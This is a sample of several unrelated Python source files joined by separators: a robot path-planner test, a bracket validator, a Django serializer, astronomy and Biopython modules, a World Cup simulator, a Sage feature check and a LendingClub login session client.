cmd_vel = planner_dwa.solve(robot.get_pose(), robot.get_velocity())
if cmd_vel is None:
# raise Exception("no solution found!")
cmd_vel = (0.0, 0.0)
robot.set_velocity(cmd_vel)
else:
robot.set_velocity(cmd_vel)
# update robot state
robot.update(dt)
human0.update(dt)
sleep(dt * 0.2)
# plot at lower frequency
if k % r_plot == 0:
robot.plot(ax)
human0.plot(ax)
plt.pause(0.001)
# update simulation time
t_curr += dt
if __name__ == "__main__":
# test_global_planner()
test_dwa_planner()
|
class Solution:
def isValid(self, s: str) -> bool:
if s.count('(') == s.count(')') and s.count('[') == s.count(']') and s.count('{') == s.count('}'):
dic = {'}':'{',']':'[',')':'('}
a=[]
for x in s:
if x in [']',')','}'] and len(a)!=0 :
if a[-1] == dic[x] :a.pop()
elif x in ['[','(','{']:a.append(x)
else:return False
if a:return False
else:return True
else:
return False
|
from rest_framework import serializers
from django.http import Http404
from rest_framework import status
from rest_framework.response import Response
from ..projects import ProjectSerializer
from iaso.models import Project, FeatureFlag, Form
from hat.audit import models as audit_models
import logging
logger = logging.getLogger(__name__)
class AppSerializer(ProjectSerializer):
"""We override the project serializer to "switch" the id and app_id fields. It means that within the "apps" API,
the app_id field from the Project model is used as the primary key."""
class Meta(ProjectSerializer.Meta):
model = Project
fields = ["id", "name", "app_id", "forms", "feature_flags", "needs_authentication", "created_at", "updated_at"]
read_only_fields = ["id", "created_at", "updated_at"]
id = serializers.CharField(read_only=True, source="app_id")
def validate_forms(self, data):
validated_forms = []
current_account_id = self.context["request"].user.iaso_profile.account.id
for f in data:
account_ids = Form.objects.filter(id=f.id).values_list("projects__account", flat=True).distinct()
if current_account_id in account_ids:
validated_forms.append(f)
else:
raise serializers.ValidationError("Form not associated to any of the accounts")
return validated_forms
def create(self, validated_data):
new_app = Project()
request = self.context["request"]
app_id = validated_data.get("app_id", None)
account = request.user.iaso_profile.account
name = validated_data.get("name", None)
forms = validated_data.get("forms", None)
needs_auth = validated_data.get("needs_authentication", None)
feature_flags = validated_data.get("feature_flags", None)
new_app.app_id = app_id
new_app.name = name
new_app.account = account
new_app.needs_authentication = False if needs_auth is None else needs_auth
if "REQUIRE_AUTHENTICATION" in list(f_f["code"] for f_f in feature_flags):
new_app.needs_authentication = True
else:
new_app.needs_authentication = False
new_app.save()
if forms is not None:
for f in forms:
new_app.forms.add(f)
if feature_flags is not None:
for f_f in feature_flags:
f_f_object = FeatureFlag.objects.get(code=f_f["code"])
new_app.feature_flags.add(f_f_object)
if needs_auth == True: # Line should be removed when this field is removed
new_app.feature_flags.add(FeatureFlag.objects.get(code="REQUIRE_AUTHENTICATION"))
# else:
# new_app.feature_flags.remove(FeatureFlag.objects.get(code="REQUIRE_AUTHENTICATION"))
return new_app
def update(self, instance, validated_data):
feature_flags = validated_data.pop("feature_flags", None)
needs_authentication = validated_data.pop("needs_authentication", None)
forms = validated_data.pop("forms", None)
app_id = validated_data.pop("app_id", None)
name = validated_data.pop("name", None)
if app_id is not None:
instance.app_id = app_id
if name is not None:
instance.name = name
if needs_authentication is not None: # Line should be removed when this field is removed
instance.needs_authentication = needs_authentication
if "REQUIRE_AUTHENTICATION" in list(f_f["code"] for f_f in feature_flags):
instance.needs_authentication = True
else:
instance.needs_authentication = False
instance.save()
if forms is not None:
instance.forms.clear()
for f in forms:
instance.forms.add(f)
if feature_flags is not None:
instance.feature_flags.clear()
for f_f in feature_flags:
f_f_object = FeatureFlag.objects.get(code=f_f["code"])
instance.feature_flags.add(f_f_object)
if needs_authentication == True: # Line should be removed when this field is removed
instance.feature_flags.add(FeatureFlag.objects.get(code="REQUIRE_AUTHENTICATION"))
return instance
|
"""
Let's start with the most simplest problem that can exist in Python.
Todo: Given three integers, return the largest integer.
"""
# solution one
def greatest_1(a, b, c):
return max(a, b, c)
# solution two
def greatest_2(a, b, c):
if a > b and a > c:
return a
elif b > a and b > c:
return b
elif c > b and c > a:
return c
# solution 3
def greatest_3(a, b, c):
...
|
import os,re, glob
import numpy as np
import pandas as pd
import logging
import tarfile
from distutils.version import StrictVersion
from ..config import ISOCHRONES
from ..grid import ModelGrid
class ParsecModelGrid(ModelGrid):
name = 'parsec'
common_columns = ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')
phot_systems = ('opt', 'gaia', 'ir', 'sdss')
phot_bands = dict(opt=['Umag', 'Bmag', 'Vmag',
'Rmag', 'Imag','Jmag', 'Hmag', 'Kmag'],
gaia=['Gmag', 'G_BPmag', 'G_RPmag'],
ir=['IRAC_3.6mag ', 'IRAC_4.5mag', 'IRAC_5.8mag', 'IRAC_8.0mag', 'MIPS_24mag', 'W1mag', 'W2mag', 'W3mag', 'W4mag'],
sdss=['umag', 'gmag', 'rmag', 'imag', 'zmag'])
default_kwargs = {'version':'1.0'}
datadir = os.path.join(ISOCHRONES, 'parsec')
#zenodo_record = 161241
#zenodo_files = ()#('mist.tgz',)
#zenodo_md5 = ('0deaaca2836c7148c27ce5ba5bbdfe59',)
#master_tarball_file = 'parsec.tgz'
default_bands = ('G','BP','RP','J','H','K','W1','W2','W3','g','r','i','z')
def __init__(self, *args, **kwargs):
version = kwargs.get('version', self.default_kwargs['version'])
version = StrictVersion(str(version))
super().__init__(*args, **kwargs)
@classmethod
def get_common_columns(cls, version=None, **kwargs):
if version is None:
version = cls.default_kwargs['version']
version = StrictVersion(str(version))
return ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')
@property
def version(self):
return StrictVersion(str(self.kwargs['version']))
@property
def common_columns(self):
return self.get_common_columns(self.version)
def phot_tarball_url(self, phot):
if phot=='ir': url = 'https://www.dropbox.com/s/rlb5ifn2htbgn5l/ir.tar.gz?dl=1'
if phot=='sdss': url = 'https://www.dropbox.com/s/6ep3g9ey8j6waxl/sdss.tar.gz?dl=1'
if phot=='gaia': url = 'https://www.dropbox.com/s/120hxb4n88apaov/gaia.tar.gz?dl=1'
if phot=='opt': url = 'https://www.dropbox.com/s/vdu58x4pfjbuhsz/opt.tar.gz?dl=1'
return url
@classmethod
def get_band(cls, b, **kwargs):
"""Defines what a "shortcut" band name refers to. Returns phot_system, band
"""
phot = None
# Default to SDSS for these
if b in ['u','g','r','i','z']:
phot = 'sdss'
band = '{}mag'.format(b)
elif b in ['U','B','V','R','I','J','H','K']:
phot = 'opt'
band = '{}mag'.format(b)
elif b in ['W1','W2','W3','W4']:
phot = 'ir'
band = '{}mag'.format(b)
elif b in ('G'):
phot = 'gaia'
band = '{}mag'.format(b)
elif b in ('BP','RP'):
phot = 'gaia'
band = 'G_{}mag'.format(b)
if phot is None:
for system, bands in cls.phot_bands.items():
if b in bands:
phot = system
band = b
break
if phot is None:
raise ValueError('Parsec grids cannot resolve band {}!'.format(b))
return phot, band
@classmethod
def phot_tarball_file(cls, phot, **kwargs):
return os.path.join(cls.datadir, '{}.tar.gz'.format(phot))
def get_filenames(self, phot):
d = os.path.join(self.datadir, '{}'.format(phot))
if not os.path.exists(d):
if not os.path.exists(self.phot_tarball_file(phot)):
self.extract_phot_tarball(phot)
return [os.path.join(d,f) for f in os.listdir(d) if re.search('\.dat$', f)]
@classmethod
def get_feh(cls, filename):
m = re.search('([mp])([0-9]{3}).', filename)
if m:
sign = 1 if m.group(1)=='p' else -1
return float(m.group(2))/100. * sign
else:
raise ValueError('{} not a valid Parsec file? Cannnot parse [Fe/H]'.format(filename))
@classmethod
def to_df(cls, filename):
with open(filename, 'r', encoding='latin-1') as fin:
while True:
line = fin.readline()
if re.match('# Zini', line):
column_names = line[1:].split()
break
feh = cls.get_feh(filename)
df = pd.read_table(filename, comment='#', delim_whitespace=True,
skip_blank_lines=True, names=column_names)
df['feh']=cls.get_feh(filename)
df['Zini'] = df['feh']#feh
df['Age'] = np.log10(df['Age'])
return df
def df_all(self, phot, **kwargs):
df = super(ParsecModelGrid, self).df_all(phot)
df = df.sort_values(by=['feh','Age','Mini'])
df.index = [df.feh, df.Age]
return df
def hdf_filename(self, phot):
return os.path.join(self.datadir, '{}.h5'.format(phot))
|
import os, yaml
from .exception import YamlErrorConfigFileParsing, NoConfigFileFound, YamlErrorConfigFileBadType
config_file_name = '.makaron.yml'
config_file_content = \
'''# {}
# more info at https://makaron.gitlab.io
setup.py: "__version__ = '[version]'"
'''.format(config_file_name)
def generate_config_file():
with open(config_file_name, 'w') as stream:
stream.write(config_file_content)
def read_config_file():
if os.path.isfile(config_file_name):
with open(config_file_name, 'r') as stream:
try:
content = stream.read()
config = yaml.safe_load(content)
if not isinstance(config, dict):
raise YamlErrorConfigFileBadType(type(config))
return config
except yaml.YAMLError as exc:
raise YamlErrorConfigFileParsing(exc)
else:
raise NoConfigFileFound()
|
# Simple lineaer regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Salary_Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 1].values
# Splitting Data
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
# Fitting Simple Linear Regression to the Training Set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predicting the Test set results
y_pred = regressor.predict(X_test)
# Visialising the Training set results
plt.scatter(X_train, y_train, color='red')
plt.plot(X_train, regressor.predict(X_train), color='blue')
plt.title('Salary vs Experience {Training set}')
plt.xlabel('Yeras of experience')
plt.ylabel('Salary')
plt.show() |
# Copyright 2004 by Bob Bussell. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""NOEtools: For predicting NOE coordinates from assignment data.
The input and output are modelled on nmrview peaklists.
This modules is suitable for directly generating an nmrview
peaklist with predicted crosspeaks directly from the
input assignment peaklist.
"""
from . import xpktools
def predictNOE(peaklist, originNuc, detectedNuc, originResNum, toResNum):
"""Predict the i->j NOE position based on self peak (diagonal) assignments
Parameters
----------
peaklist : xprtools.Peaklist
List of peaks from which to derive predictions
originNuc : str
Name of originating nucleus.
originResNum : int
Index of originating residue.
detectedNuc : str
Name of detected nucleus.
toResNum : int
Index of detected residue.
Returns
-------
returnLine : str
The .xpk file entry for the predicted crosspeak.
Examples
--------
Using predictNOE(peaklist,"N15","H1",10,12)
where peaklist is of the type xpktools.peaklist
would generate a .xpk file entry for a crosspeak
that originated on N15 of residue 10 and ended up
as magnetization detected on the H1 nucleus of
residue 12
Notes
=====
The initial peaklist is assumed to be diagonal (self peaks only)
and currently there is no checking done to insure that this
assumption holds true. Check your peaklist for errors and
off diagonal peaks before attempting to use predictNOE.
"""
returnLine = "" # The modified line to be returned to the caller
datamap = _data_map(peaklist.datalabels)
# Construct labels for keying into dictionary
originAssCol = datamap[originNuc + ".L"] + 1
originPPMCol = datamap[originNuc + ".P"] + 1
detectedPPMCol = datamap[detectedNuc + ".P"] + 1
# Make a list of the data lines involving the detected
if str(toResNum) in peaklist.residue_dict(detectedNuc) \
and str(originResNum) in peaklist.residue_dict(detectedNuc):
detectedList = peaklist.residue_dict(detectedNuc)[str(toResNum)]
originList = peaklist.residue_dict(detectedNuc)[str(originResNum)]
returnLine = detectedList[0]
for line in detectedList:
aveDetectedPPM = _col_ave(detectedList, detectedPPMCol)
aveOriginPPM = _col_ave(originList, originPPMCol)
originAss = originList[0].split()[originAssCol]
returnLine = xpktools.replace_entry(returnLine, originAssCol + 1, originAss)
returnLine = xpktools.replace_entry(returnLine, originPPMCol + 1, aveOriginPPM)
return returnLine
def _data_map(labelline):
# Generate a map between datalabels and column number
# based on a labelline
i = 0 # A counter
datamap = {} # The data map dictionary
labelList = labelline.split() # Get the label line
# Get the column number for each label
for i in range(len(labelList)):
datamap[labelList[i]] = i
return datamap
def _col_ave(list, col):
# Compute average values from a particular column in a string list
total = 0.0
n = 0
for element in list:
total += float(element.split()[col])
n += 1
return total / n
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 3 16:02:44 2019
@author: gptshubham595
"""
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import cv2
import matplotlib.pyplot as plot
def main():
#Various Colour spaces
#HSV-Hue Saturation Value
#GRAY
#CMY - Can Marientine Yellow
#RGB
#BGR
#print('cv2 version:',format(cv2.__version__))
imgpath="C:\\opencv learn machin\\misc\\4.1.01.tiff"
#1-by preserving same colour default
#0-grayscale
#cv2.imread is saved in memory as B G R
img=cv2.imread(imgpath,1)
img1=cv2.imread(imgpath,1)
#changed image colour from BGR to RGB
img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
#cmap=colormap
#plot.imshow saves as R G B
plot.imshow(img)
plot.title('RGB')
#remove griding numbers in x and y scale
plot.xticks([])
plot.yticks([])
plot.show()
plot.imshow(img1)
plot.title('BGR')
plot.show()
if __name__=="__main__" :
main()
|
"""
https://www.fifaindex.com/teams/?type=1
https://www.fifaindex.com/teams/fifa07_3/?league=78&type=1
https://www.fifaindex.com/teams/fifa06_2/?league=78&type=1
Attacks per game - average unknown
Number of attacks,
Goals per game
http://www.slate.com/articles/sports/sports_nut/2013/08/the_numbers_game_why_soccer_teams_score_fewer_goals_than_they_did_100_years.html
"""
import csv
import copy
import random
import math
from collections import OrderedDict
AVERAGE_GOALS_PER_GAME = 2.6
AVERAGE_SHOTS_PER_GAME = 20 # Per team, shots on target about 50%. Attack and midfield + some random boost
EXTRA_ATTACK_RATIO = 15 # For better team
class WorldCupper(object):
def __init__(self, filename='worldcupper.csv'):
self.groups = {} # Team groups in WC
with open(filename, mode='r', encoding='utf-8-sig') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
row['goals_for'] = 0
row['goals_against'] = 0
row['goals_diff'] = 0
row['games_won'] = 0
row['games_lost'] = 0
row['games_tied'] = 0
row['points'] = 0
row['name'] = row['name'].capitalize()
self.groups.setdefault(row['group'], []).append(row)
self.total_group_goals = 0
self.games = 0
self.total_knockout_goals = 0
def run_group_stage(self):
# Run group stage
self.groups = OrderedDict(sorted(self.groups.items()))
for group_name, group_teams in self.groups.items():
for i, team1 in enumerate(group_teams):
for team2 in group_teams[i+1:]:
team1_score, team2_score, total_goals, _ = self.run_match(team1, team2)
self.games += 1
self.total_group_goals += total_goals
team1['goals_for'] += team1_score
team2['goals_for'] += team2_score
team1['goals_against'] += team2_score
team2['goals_against'] += team1_score
team1['goals_diff'] += team1_score - team2_score
team2['goals_diff'] += team2_score - team1_score
if team1_score > team2_score:
team1['games_won'] += 1
team1['points'] += 3
team2['games_lost'] += 1
elif team1_score == team2_score:
team1['games_tied'] += 1
team2['games_tied'] += 1
team1['points'] += 1
team2['points'] += 1
elif team1_score < team2_score:
team2['games_won'] += 1
team1['games_lost'] += 1
team2['points'] += 3
print(team1['name'], ' ', team1_score, ' vs ', team2['name'], ' ',
team2_score)
# Summary of groups
print('total goals in ', self.games, ' games ', self.total_group_goals)
print('goals per game ', self.total_group_goals/self.games)
for group_name, group_teams in self.groups.items():
print('Group {}'.format(group_name))
print('team, points, games won, games lost, games tied, goals for, goals against, goal diff')
# group_teams = sorted(group_teams, key=lambda k: k['points'], reverse=True)
# Sort groups by points,
group_teams = sorted(group_teams, key=lambda k: (k['points'], k['goals_diff']), reverse=True)
for i, team in enumerate(group_teams):
print(team['name'], team['points'], team['games_won'], team['games_lost'], team['games_tied'],
team['goals_for'], team['goals_against'], team['goals_diff'])
print('')
def run_round(self, current_round_matches):
current_round_matches = copy.deepcopy(current_round_matches)
next_round_matches = []
next_match = []
round_total_goals = 0
for i, match_teams in enumerate(current_round_matches):
team1_score, team2_score, total_goals, winning_team = self.run_match(match_teams[0], match_teams[1],
do_penalties=True)
# Save scores in original dict
match_teams[0]['score'] = team1_score
match_teams[1]['score'] = team2_score
round_total_goals += total_goals
# print(match_teams[0]['name'], match_teams[0]['score'], match_teams[1]['name'], match_teams[1]['score'])
# winning_team['score'] = None
next_match.append(winning_team)
if i % 2:
next_round_matches.append(next_match)
next_match = []
# Single winner edge case for round of 2 teams (final)
final_winner = None
if not next_round_matches:
final_winner = next_match[0]
return next_round_matches, current_round_matches, final_winner, round_total_goals
def run_knockout_stage(self):
groups = self.groups
# Final 16 teams
final_16_matches = [
[groups['a'][0], groups['b'][1]], [groups['c'][0], groups['d'][1]],
[groups['e'][0], groups['f'][1]], [groups['g'][0], groups['h'][1]],
[groups['b'][0], groups['a'][1]], [groups['d'][0], groups['c'][1]],
[groups['f'][0], groups['e'][1]], [groups['h'][0], groups['g'][1]]
]
# Final 16
# print('')
# print("Final 16")
quarter_final_matches, final_16_matches, _, total_goals = self.run_round(final_16_matches)
self.total_knockout_goals += total_goals
# Semi finals
# print('')
# print("Semi Finals")
semi_final_matches, quarter_final_matches, _, total_goals = self.run_round(quarter_final_matches)
self.total_knockout_goals += total_goals
# Quarter finals
# print('')
# print("Quarter Finals")
final_match, semi_final_matches, _, total_goals = self.run_round(semi_final_matches)
self.total_knockout_goals += total_goals
# Final
# print('')
# print("Final")
_, final_match, winner, total_goals = self.run_round(final_match)
self.total_knockout_goals += total_goals
# Winner
# print('')
# print("WC Winner: {}".format(winner['name']))
self.draw_knockout_table(final_16_matches, quarter_final_matches, semi_final_matches, final_match, winner)
def attack(self, team_attack, team_overall, number_of_attacks, other_team_defense):
"""
Get team score on attack
:param team_attack:
:param team_overall:
:param number_of_attacks:
:param other_team_defense:
:return:
"""
team_score = 0
for _ in range(number_of_attacks):
# attack = how many are on target, chance of scoring
chance_of_scoring = random.random() * team_attack * team_overall
# defense = how many go in
chance_of_defense = random.random() * other_team_defense * team_overall
# print(chance_of_scoring, chance_of_defense, 'attack ', team_attack, 'other team def', other_team_defense)
if chance_of_scoring > chance_of_defense:
team_score += 1
return team_score
def get_total_goals(self, team1_attack, team2_attack, team1_defense, team2_defense):
total_goals = max(AVERAGE_GOALS_PER_GAME * random.uniform(0, 3) + (
(team1_attack + team2_attack - team1_defense - team2_defense) * 10) - 2, 0)
return total_goals
def normalize_goals(self, team1_score, team2_score, team1_attack, team2_attack, team1_defense, team2_defense,
total_goals=None):
"""
Normalize match goals
:param team1_score:
:param team2_score:
:param team1_attack:
:param team2_attack:
:param team1_defense:
:param team2_defense:
:param total_goals:
:return:
"""
if not total_goals:
# CForce total_goals to be > 0 if the diff b/w team1_score & team2_score is high
total_goals = self.get_total_goals(team1_attack, team2_attack, team1_defense, team2_defense)
if not total_goals and math.fabs(team1_score - team2_score) > 4:
total_goals = self.get_total_goals(team1_attack, team2_attack, team1_defense, team2_defense)
total_goals = int(round(total_goals, 0))
team1_new_score = team2_new_score = 0
if team1_score:
team1_new_score = int(round(team1_score / (team1_score + team2_score) * total_goals, 0))
if team2_score:
team2_new_score = int(round(team2_score / (team1_score + team2_score) * total_goals, 0))
return team1_new_score, team2_new_score, total_goals
def run_match(self, team1, team2, do_penalties=False):
"""
Run a match simulation
:param team1:
:param team2:
:param do_penalties:
:return:
"""
# Lower is better. FIFA rating is not as significant.
team1_overall_rating = float(float(team1['fifa_rating']) / 2.0) + float(team1['elo_rating']) + \
float(team1['goalimpact_rating']) + (5 - float(team1['ea_fifa_18_rating']))
team2_overall_rating = float(float(team1['fifa_rating']) / 2.0) + float(team2['elo_rating']) + \
float(team2['goalimpact_rating']) + (5 - float(team2['ea_fifa_18_rating']))
# print('overall', team1_overall_rating, team2_overall_rating)
team1_relative_rating = team1_overall_rating / max(team1_overall_rating, team2_overall_rating)
team2_relative_rating = team2_overall_rating / max(team1_overall_rating, team2_overall_rating)
team1_relative_rating = 1.0 - team1_relative_rating
team2_relative_rating = 1.0 - team2_relative_rating
# print('relative!!', team1_relative_rating, team2_relative_rating)
# TODO: Man not need random factor
# team1_random_factor = float(team1['overall']) / 100.0 * random.random() + \
# (float(team1['boost']) / 100.0)
# team2_random_factor = float(team2['overall']) / 100.0 * random.random() + \
# (float(team2['boost']) / 100.0)
# print('rand factor', team1_random_factor, team2_random_factor)
# midfield = how many shots you get (attacks)
team1_attack = float(team1['att']) / 100.0
team2_attack = float(team2['att']) / 100.0
team1_midfield = float(team1['mid']) / 100.0
team2_midfield = float(team2['mid']) / 100.0
team1_defense = float(team1['def']) / 100.0
team2_defense = float(team2['def']) / 100.0
team1_overall = float(team1['overall']) / 100.0
team2_overall = float(team2['overall']) / 100.0
# How much better is team 1 vs team 2?
attack_diff_factor = math.fabs(team2_attack - team1_attack) * 2
team1_attack_boost_min = 0.5
team1_attack_boost_max = 1.0
team2_attack_boost_min = 0.5
team2_attack_boost_max = 1.0
if team1_attack > team2_attack:
team1_attack_boost_max = team1_attack_boost_max + attack_diff_factor
team1_attack_boost_min = team1_attack_boost_min - attack_diff_factor
elif team1_attack < team2_attack:
team2_attack_boost_max = team2_attack_boost_max + attack_diff_factor
team2_attack_boost_min = team2_attack_boost_min - attack_diff_factor
team1_number_of_attacks = random.uniform((team1_attack + team1_midfield) / 2.0,
1.0) * AVERAGE_SHOTS_PER_GAME * random.uniform(
team1_attack_boost_min, team1_attack_boost_max)
team2_number_of_attacks = random.uniform((team2_attack + team2_midfield) / 2.0,
1.0) * AVERAGE_SHOTS_PER_GAME * random.uniform(
team2_attack_boost_min, team2_attack_boost_max)
# team2_number_of_attacks = float(team1['att']) / 100.0 * float(team2['mid']) / 100.0 * \
# random.uniform(0.25, 1.0) * AVERAGE_SHOTS_PER_GAME
team1_number_of_attacks = int(round(team1_number_of_attacks, 0))
team2_number_of_attacks = int(round(team2_number_of_attacks, 0))
# print('no of shots/attacks', round(team1_number_of_attacks, 1), team2_number_of_attacks)
# print('attack for ', team1['name'])
team1_score = self.attack(team1_attack, team1_overall, team1_number_of_attacks, team2_defense)
# print('attack for ', team2['name'])
team2_score = self.attack(team2_attack, team2_overall, team2_number_of_attacks, team1_defense)
# print(team1_score, team2_score)
# Additional goals, based on relative rating
# print('relative is', team1['name'], team1_relative_rating, team2['name'], team2_relative_rating)
if team1_relative_rating > team2_relative_rating:
# Team 1 better, lower is better
# team1_score = team1_score + (team1_relative_rating * random.random() * 100)
team1_extra_attacks = int(round(team1_relative_rating * random.random() * EXTRA_ATTACK_RATIO, 0))
# print('team1 better', team1['name'], team1_extra_attacks)
team1_score += self.attack(team1_attack, team1_overall, team1_extra_attacks, team2_defense)
elif team1_relative_rating < team2_relative_rating:
# Team 2 better, lower is better
# team2_score = team2_score + (team2_relative_rating * random.random() * 100)
team2_extra_attacks = int(round(team2_relative_rating * random.random() * EXTRA_ATTACK_RATIO, 0))
# print('team2 better', team2['name'], team2_extra_attacks)
team2_score += self.attack(team2_attack, team2_overall, team2_extra_attacks, team1_defense)
team1_score, team2_score, total_goals = self.normalize_goals(team1_score, team2_score, team1_attack,
team2_attack, team1_defense, team2_defense)
# Penalties if applicable
if team1_score == team2_score and do_penalties:
team1_penalties = 0
team2_penalties = 0
penalties_taken = 0
while team1_penalties == team2_penalties or penalties_taken < 5:
team1_penalties += self.attack(team1_attack, team1_overall, 1, team2_defense)
team2_penalties += self.attack(team2_attack, team2_overall, 1, team1_defense)
penalties_taken += 1
if team1_penalties > team2_penalties:
team1_score += 1
else:
team2_score += 1
winning_team = None
if team1_score > team2_score:
winning_team = team1
elif team2_score > team1_score:
winning_team = team2
# TODO: Return penalties scored if applicable
return team1_score, team2_score, total_goals, winning_team
def draw_knockout_table(self, final_16_matches, quarter_final_matches, semi_final_matches, final_match, winner):
args = []
for match in final_16_matches + quarter_final_matches + semi_final_matches + final_match:
args.append(match[0]['name'] + ' ' + str(match[0]['score']))
args.append(match[1]['name'] + ' ' + str(match[1]['score']))
args.append(winner['name'])
table = ("\n"
"Left:\n"
"{0}\n"
"{1}\n"
" {16}\n"
" {17}\n"
"{2}\n"
" {24}\n"
"{3}\n"
" {28}\n"
"{4}\n"
"{5}\n"
" {25}\n"
" {18}\n"
" {19}\n"
"{6}\n"
"{7}\n"
" {30}\n"
"Right:\n"
"{8}\n"
"{9}\n"
" {20}\n"
" {21}\n"
"{10}\n"
" {26}\n"
"{11}\n"
" {29}\n"
"{12}\n"
"{13}\n"
" {27}\n"
" {22}\n"
" {23}\n"
"{14}\n"
"{15}\n").format(*args)
print(table)
if __name__ == "__main__":
wc = WorldCupper()
wc.run_group_stage()
wc.run_knockout_stage()
|
r"""
Features for testing the presence of Singular
"""
from . import Executable
from sage.env import SINGULAR_BIN
class Singular(Executable):
r"""
A :class:`~sage.features.Feature` describing the presence of the Singular executable.
EXAMPLES::
sage: from sage.features.singular import Singular
sage: Singular().is_present()
FeatureTestResult('singular', True)
"""
def __init__(self):
r"""
TESTS::
sage: from sage.features.singular import Singular
sage: isinstance(Singular(), Singular)
True
"""
Executable.__init__(self, "singular", SINGULAR_BIN,
spkg='singular')
|
#!/usr/bin/env python
"""
Manage the LendingClub user session and all raw HTTP calls to the LendingClub site.
This will almost always be accessed through the API calls in
:class:`lendingclub.LendingClub` instead of directly.
"""
"""
The MIT License (MIT)
Copyright (c) 2013 Jeremy Gillick
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import re
import requests
import getpass
import time as time
from bs4 import BeautifulSoup
from requests.exceptions import *
class Session:
email = None
__pass = None
__logger = None
last_response = None
session_timeout = 10
""" Minutes until the session expires.
The session will attempt to reauth before the next HTTP call after timeout."""
base_url = 'https://www.lendingclub.com/'
""" The root URL that all paths are appended to """
last_request_time = 0
""" The timestamp of the last HTTP request """
__session = None
def __init__(self, email=None, password=None, logger=None):
self.email = email
self.__pass = password
self.__logger = logger
def __log(self, message):
"""
Log a debugging message
"""
if self.__logger:
self.__logger.debug(message)
def __continue_session(self):
"""
Check if the time since the last HTTP request is under the
session timeout limit. If it's been too long since the last request
attempt to authenticate again.
"""
now = time.time()
diff = abs(now - self.last_request_time)
timeout_sec = self.session_timeout * 60 # convert minutes to seconds
if diff >= timeout_sec:
self.__log('Session timed out, attempting to authenticate')
self.authenticate()
def set_logger(self, logger):
"""
Have the Session class send debug logging to your python logging logger.
Set to None stop the logging.
Parameters
----------
logger : `Logger <http://docs.python.org/2/library/logging.html>`_
The logger to send debug output to.
"""
self.__logger = logger
def build_url(self, path):
"""
Build a LendingClub URL from a URL path (without the domain).
Parameters
----------
path : string
The path part of the URL after the domain. i.e. https://www.lendingclub.com/<path>
"""
url = '{0}{1}'.format(self.base_url, path)
url = re.sub('([^:])//', '\\1/', url) # Remove double slashes
return url
def authenticate(self, email=None, password=None):
"""
Authenticate with LendingClub and preserve the user session for future requests.
This will raise an exception if the login appears to have failed, otherwise it returns True.
Since Lending Club doesn't seem to have a login API, the code has to try to decide if the login
worked or not by looking at the URL redirect and parsing the returned HTML for errors.
Parameters
----------
email : string
The email of a user on Lending Club
password : string
The user's password, for authentication.
Returns
-------
boolean
True on success or throws an exception on failure.
Raises
------
session.AuthenticationError
If authentication failed
session.NetworkError
If a network error occurred
"""
# Get email and password
if email is None:
email = self.email
else:
self.email = email
if password is None:
password = self.__pass
else:
self.__pass = password
# Get them from the user
if email is None:
email = raw_input('Email:')
self.email = email
if password is None:
password = getpass.getpass()
self.__pass = password
self.__log('Attempting to authenticate: {0}'.format(self.email))
# Start session
self.__session = requests.Session()
self.__session.headers = {
'Referer': 'https://www.lendingclub.com/',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31'
}
# Set last request time to now
self.last_request_time = time.time()
# Send login request to LC
payload = {
'login_email': email,
'login_password': password
}
response = self.post('/account/login.action', data=payload, redirects=False)
# Get URL redirect URL and save the last part of the path as the endpoint
response_url = response.url
if response.status_code == 302:
response_url = response.headers['location']
endpoint = response_url.split('/')[-1]
# Debugging
self.__log('Status code: {0}'.format(response.status_code))
self.__log('Redirected to: {0}'.format(response_url))
self.__log('Cookies: {0}'.format(str(response.cookies.keys())))
# Show query and data that the server received
if 'x-echo-query' in response.headers:
self.__log('Query: {0}'.format(response.headers['x-echo-query']))
if 'x-echo-data' in response.headers:
self.__log('Data: {0}'.format(response.headers['x-echo-data']))
# Parse any errors from the HTML
soup = BeautifulSoup(response.text, "html5lib")
errors = soup.find(id='master_error-list')
if errors:
errors = errors.text.strip()
# Remove extra spaces and newlines from error message
errors = re.sub('\t+', '', errors)
errors = re.sub('\s*\n+\s*', ' * ', errors)
if errors == '':
errors = None
# Raise error
if errors is not None:
raise AuthenticationError(errors)
# Redirected back to the login page...must be an error
if endpoint == 'login.action':
raise AuthenticationError('Unknown! Redirected back to the login page without an error message')
return True
def is_site_available(self):
"""
Returns true if we can access LendingClub.com
This is also a simple test to see if there's a network connection
Returns
-------
boolean
True or False
"""
